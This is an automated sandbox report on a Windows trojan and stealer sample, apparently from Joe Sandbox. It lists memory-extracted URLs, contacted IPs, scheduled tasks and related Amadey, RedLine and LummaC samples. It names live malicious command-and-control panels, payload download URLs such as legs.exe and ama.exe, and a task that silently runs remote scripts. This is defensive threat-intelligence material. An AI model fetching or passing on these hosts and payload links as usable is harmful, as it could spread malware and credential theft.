http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/ip	RegAsm.exe, 00000017.00000002.2259714119.0000000003105000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbuseruploads.s3.amazonaws.com	ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.116/Mb3GvQs8/index.php1mb3JtLXVybGVuY29kZWQ=x	Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0	svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id1ResponseD	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/msangcwam	svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258174424.0000018F5BD57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdp&	svchost.exe, 0000001D.00000003.2303736884.0000018F5BD07000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.116/Mb3GvQs8/index.phpQs8/index.php	Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.ver)	svchost.exe, 0000001C.00000002.2331519432.0000019C9FC00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221015454.0000018F5B4D3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://passport.net/tb	svchost.exe, 0000001D.00000003.4214845462.0000018F5C25E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdcLPe	svchost.exe, 0000001D.00000003.2362123651.0000018F5BD82000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phptch	axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id14LR	RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21ResponseD	ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id6LR	RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/	ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221491538.0000018F5B4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4217201170.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214999799.0000018F5BD6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2325042741.0000018F5BD6E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.116/Mb3GvQs8/index.php6/	Hkbsse.exe, 0000000B.00000003.4163688798.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 0000000B.00000002.4490320426.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes	svchost.exe, 0000001D.00000003.2379195931.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2392391425.0000018F5BD78000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.116/Mb3GvQs8/index.phpncoded:	Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id10ResponseD	ama.exe, 00000004.00000002.2393678580.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/lend/legs.exeZ	axplong.exe, 00000002.00000002.4499726600.0000000005B7F000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899428303.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id5Response	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	ama.exe, 00000004.00000002.2393678580.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://moreapp4you.online	ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/lend/ama.exew	axplong.exe, 00000002.00000002.4492544980.0000000001419000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://tempuri.org/Entity/Id8Response	ama.exe, 00000004.00000002.2393678580.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22LR	RegAsm.exe, 00000007.00000002.4495505578.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4495505578.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://77.91.77.81/Kiru9gu/index.phpgd	axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf	svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.co/1lLubL	ama.exe, 00000004.00000002.2402263316.0000000005881000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.s	RegAsm.exe, 00000017.00000002.2259714119.0000000003105000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.116	unknown	Russian Federation	50916	NADYMSS-ASRU	true
58.65.168.132	comrex.pk	Pakistan	23674	NAYATEL-PKNayatelPvtLtdPK	false
185.215.113.67	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
4.185.27.237	unknown	United States	3356	LEVEL3US	true
154.41.249.241	starjod.xyz	United States	174	COGENT-174US	true
185.199.111.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
31.31.196.208	moreapp4you.online	Russian Federation	197695	AS-REGRU	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
3.5.27.203	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
67.199.248.11	bit.ly	United States	396982	GOOGLE-PRIVATE-CLOUDUS	true
172.67.214.243	findalltechs.xyz	United States	13335	CLOUDFLARENETUS	true
140.82.121.3	github.com	United States	36459	GITHUBUS	true
142.250.185.132	unknown	United States	15169	GOOGLEUS	false
54.67.42.145	pixel.com	United States	16509	AMAZON-02US	false
172.67.167.249	iplogger.co	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
77.91.77.81	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	true
84.32.84.161	unknown	Lithuania	33922	NTT-LT-ASLT	false

Private

IP
192.168.2.7
192.168.2.4
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1461336
Start date and time:	2024-06-24 00:09:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	62
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hsRju5CPK2.exe renamed because original name is a hash value
Original Sample Name:	e77913dfeb423031e19acbd2460dffea.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@135/67@17/22
EGA Information:	Successful, ratio: 77.8%
HCA Information:	Successful, ratio: 59% Number of executed functions: 238 Number of non-executed functions: 163
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95, 40.126.31.69, 40.126.31.67, 20.190.159.75, 40.126.31.73, 40.126.31.71, 20.190.159.68, 20.190.159.2, 20.190.159.0, 184.28.90.27, 216.58.206.35, 216.58.206.78, 64.233.184.84, 20.42.73.29, 142.250.74.202, 216.58.206.42, 142.250.186.74, 142.250.185.74, 142.250.185.138, 216.58.206.74, 142.250.186.138, 142.250.184.234, 172.217.16.138, 142.250.186.106, 142.250.181.234, 142.250.186.42, 142.250.184.202, 172.217.18.10, 142.250.185.106, 172.217.16.202, 199.232.210.172, 142.250.186.163, 142.250.184.238
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, facilitycoursedw.shop, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, disappointcredisotw.shop, update.googleapis.com, www.google.com, prod.fs.microsoft.com.akadns.net, optimizationguide-pa.googleapis.com, clients1.google.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target axplong.exe, PID 2260 because there are no executed function
Execution Graph export aborted for target hsRju5CPK2.exe, PID 6348 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:09:59	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
00:10:14	Task Scheduler	Run new task: Hkbsse path: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
00:10:18	Task Scheduler	Run new task: CCleaner path: "C:\Program Files\Google\Chrome\Application\chrome.exe" s>http://starjod.xyz/Website.php
00:10:18	Task Scheduler	Run new task: Updater path: "C:\Program Files\Google\Chrome\Application\chrome.exe" s>http://starjod.xyz/Website.php
00:10:28	Task Scheduler	Run new task: Cleaner path: C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe
18:10:02	API Interceptor	12848667x Sleep call for process: axplong.exe modified
18:10:15	API Interceptor	115x Sleep call for process: ama.exe modified
18:10:15	API Interceptor	1170008x Sleep call for process: Hkbsse.exe modified
18:10:19	API Interceptor	182x Sleep call for process: powershell.exe modified
18:10:21	API Interceptor	4x Sleep call for process: svchost.exe modified
18:10:22	API Interceptor	1x Sleep call for process: FirstZ.exe modified
18:10:38	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.116	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.116/Mb3GvQs8/index.php
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.116/Mb3GvQs8/index.php
	0DHrPD3miS.exe	Get hash	malicious	Amadey	Browse	185.172.128.116/Mb3GvQs8/index.php
185.215.113.67	oMHveSc3hh.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	0KuDEDABFO.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	miOnrvnXK0.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	Rh74sODsWE.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	dSQUdo6EjO.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	usVhwck8lN.exe	Get hash	malicious	Amadey Raccoon	Browse	185.215.113.67/4dcYcWsw3/index.php
	SecuriteInfo.com.W32.AIDetect.malware1.20102.exe	Get hash	malicious	Amadey	Browse	185.215.113.67/4dcYcWsw3/index.php
	MR98F1zzeo.exe	Get hash	malicious	Amadey Raccoon Vidar	Browse	185.215.113.67/4dcYcWsw3/index.php
	8f5718a6042061b23a4e42ee5cd8112946c135dc9d0c2.exe	Get hash	malicious	Amadey	Browse	185.215.113.67/4dcYcWsw3/index.php
	fC4T1vVs24.exe	Get hash	malicious	Amadey	Browse	umbrelladownload.uno/gp6GbqVce/index.php
4.185.27.237	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse
	setup.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse
	4TzzRzv0Hs.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse
	KmhrN2q5ZO.exe	Get hash	malicious	Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, zgRAT	Browse
	jC1kC6njxs.exe	Get hash	malicious	RedLine	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pixel.com	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	54.67.42.145
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	54.67.42.145
	https://www.canva.com/design/DAGIxlOtbP0/wg4kXFv68FVeiaUc7WfPPw/view?utm_content=DAGIxlOtbP0&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	75.2.57.54
